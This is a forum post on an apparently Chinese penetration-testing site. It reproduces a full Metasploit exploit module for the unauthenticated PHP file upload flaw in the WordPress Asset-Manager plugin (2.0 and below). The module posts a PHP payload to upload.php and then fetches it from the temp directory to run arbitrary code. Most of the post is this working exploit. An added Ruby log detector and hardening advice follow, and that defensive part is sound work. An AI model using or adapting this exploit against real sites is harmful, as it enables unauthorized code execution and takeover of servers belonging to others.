China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: WordPress Asset-Manager PHP File Upload Vulnerability
Author: admin
Time: 2012-12-31 09:22

This module, from the Metasploit exploit library, targets a vulnerability found in the Asset-Manager WordPress plugin, version 2.0 and below. It allows PHP file uploads: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # PhpEXE provides get_write_exec_payload, which wraps the selected payload in a
  # PHP stub (and, for the native Linux target, drops and executes an ELF binary).
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"

    # Random .php file name so the dropped file does not collide with anything;
    # the PHP stub removes itself after it has run (:unlink_self).
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # upload.php reads the file from a multipart/form-data field named "Filedata".
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Strip the stray CRLF that Rex::MIME::Message#to_s places before the first boundary.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # A successful upload returns 200 and echoes the stored file name in the body.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    # The plugin stores uploads under the web-accessible wp-content/uploads/assets/temp/
    # directory, so a plain GET of the dropped file executes it.
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
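The module above leaves a two-step trace in the web server's access log: an unauthenticated POST to wp-content/plugins/asset-manager/upload.php, then a GET of a .php file under wp-content/uploads/assets/temp/ from the same client. The following detector is an added example, not part of the original post or of the Metasploit module; it assumes Apache/nginx "combined" log format, and the log lines embedded in it are constructed for illustration.

```ruby
# Added example (not from the original post or the Metasploit module): flag
# Asset-Manager upload.php abuse in Apache/nginx "combined" access logs.
require 'set'

# Apache "combined" format; only the fields the detector needs are captured.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Paths the exploit touches (see the module above).
UPLOAD_PATH   = %r{/wp-content/plugins/asset-manager/upload\.php\z}i
TEMP_PHP_PATH = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}i

Event = Struct.new(:ip, :time, :method, :path, :status, :kind)

# Parse one log line; return an Event only if it matches one of the two steps.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  path = m[:path].split('?', 2).first # ignore any query string
  kind =
    if m[:method] == 'POST' && path =~ UPLOAD_PATH
      :upload
    elsif m[:method] == 'GET' && path =~ TEMP_PHP_PATH
      :exec
    end
  return nil unless kind
  Event.new(m[:ip], m[:time], m[:method], path, m[:status].to_i, kind)
end

# Classify all lines and correlate by client IP: a 200 on the upload followed by
# a 200 on a .php file in the temp directory from the same IP is treated as a
# likely compromise (the dropped file was executed).
def detect(lines)
  events  = lines.map { |l| parse_line(l) }.compact
  uploads = events.select { |e| e.kind == :upload }
  execs   = events.select { |e| e.kind == :exec }
  compromised = Set.new
  execs.each do |e|
    next unless e.status == 200
    compromised << e.ip if uploads.any? { |u| u.ip == e.ip && u.status == 200 }
  end
  { uploads: uploads, execs: execs, compromised: compromised.to_a.sort }
end

# Constructed sample log lines (documentation IP ranges, invented file names).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:22:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:22:03 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 97 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:22:04 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzpw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:30:10 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 404 312 "-" "curl/7.26.0"
  192.0.2.44 - - [31/Dec/2012:09:41:00 +0800] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
LOG

if $PROGRAM_NAME == __FILE__
  result = detect(SAMPLE_LOG.lines)
  result[:uploads].each { |e| puts "upload attempt  #{e.ip} #{e.status} #{e.path}" }
  result[:execs].each   { |e| puts "exec attempt    #{e.ip} #{e.status} #{e.path}" }
  puts "likely compromised: #{result[:compromised].join(', ')}"
end
```

Run it against a real log with `detect(File.readlines('access.log'))`. The IP correlation is deliberately conservative; in practice any 200 on a POST to upload.php, and any request for a .php file under wp-content/uploads/, deserves an alert on its own, since neither should happen on a correctly configured site. Blocking PHP execution under wp-content/uploads/ at the web server also turns the second step into a harmless download.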
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/)
Powered by Discuz! X3.2